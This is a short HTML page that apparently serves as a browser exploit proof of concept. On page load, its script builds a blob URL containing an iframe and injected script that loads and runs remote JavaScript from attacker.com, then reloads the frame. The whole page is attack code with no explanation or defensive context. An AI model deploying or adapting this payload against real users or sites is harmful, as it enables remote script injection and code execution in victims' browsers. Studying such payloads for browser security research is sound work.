<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
<a id="a1" href=about:blank>click</a>
<script>
window.onload = function() {
    a1.href=URL.createObjectURL(new Blob(["<iframe id=GGGZGqHWGGG src=about:blank><\/iframe><script>GGGZGqHWGGG.onload=_=>GGGZGqHWGGG.contentDocument.body.innerHTML+='<script src=https://attacker.com/static/static.js><\\/script>';GGGZGqHWGGG.contentWindow.location.reload();<\/script>"],{type:"text/html"}))
};
</script>
</body>
</html>